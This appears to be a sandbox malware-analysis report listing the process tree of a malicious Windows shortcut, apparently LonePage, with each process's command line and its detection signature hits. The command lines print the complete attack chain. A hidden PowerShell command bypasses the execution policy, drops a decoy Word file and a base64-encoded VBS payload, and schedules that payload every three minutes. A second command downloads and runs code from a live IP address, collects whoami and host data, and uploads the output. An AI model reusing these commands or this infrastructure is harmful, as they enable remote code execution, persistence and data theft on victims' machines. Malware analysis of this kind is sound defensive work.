Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\Return.docx -value $fil -encoding byte;&$home\appdata\local\temp\Return.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi94c1NwUWJTT0dIeXpNTHhaL3BhZ2UxNjQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UxNjQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg0KDQo=';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	09:31:09
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6e3d50000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Potentially Suspicious PowerShell Child Processes	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: Script Interpreter Execution From Suspicious Folder	System Summary
Sigma detected: Suspicious PowerShell Parameter Substring	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Potential Binary Or Script Dropper Via PowerShell	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f

Details

Is windows:	true
Is dropped:	false
PID:	3404
Target ID:	6
Parent PID:	3540
Name:	schtasks.exe
Class:	system-tools
Path:	C:\Windows\System32\schtasks.exe
Commandline:	"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
Size:	235008
MD5:	76CD6626DD8834BD4A42E6A565104DC2
Time:	09:31:27
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff772690000
Modulesize:	253952
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Potentially Suspicious PowerShell Child Processes	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: Script Interpreter Execution From Suspicious Folder	System Summary
Sigma detected: Suspicious PowerShell Parameter Substring	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Uses schtasks.exe or at.exe to add and modify task schedules	Boot Survival	Scheduled Task/Job
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	1056
Target ID:	7
Parent PID:	1064
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	09:31:28
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff742f30000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}

Details

Is windows:	true
Is dropped:	false
PID:	3380
Target ID:	14
Parent PID:	1056
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr\|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	09:31:34
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6e3d50000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Potentially Suspicious PowerShell Child Processes	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: Script Interpreter Execution From Suspicious Folder	System Summary
Sigma detected: Suspicious PowerShell Parameter Substring	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Potential Binary Or Script Dropper Via PowerShell	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	3524
Target ID:	1
Parent PID:	3540
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	09:31:09
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff66e660000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o ""

Details

Is windows:	true
Is dropped:	false
PID:	4368
Target ID:	5
Parent PID:	3540
Name:	WINWORD.EXE
Class:	word
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o ""
Size:	1620872
MD5:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Time:	09:31:27
Date:	30/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x510000
Modulesize:	1617920
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Allocates a big amount of memory (probably used for heap spraying)	Software Vulnerabilities	Extra Window Memory Injection
Spawns processes	System Summary	Process Injection
Starts Microsoft Word	Hooking and other Techniques for Hiding and Protection

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

Details

Is windows:	true
Is dropped:	false
PID:	5200
Target ID:	10
Parent PID:	632
Name:	svchost.exe
Path:	C:\Windows\System32\svchost.exe
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Size:	55320
MD5:	B7F884C1B74A263F746EE12A5F7C9F6A
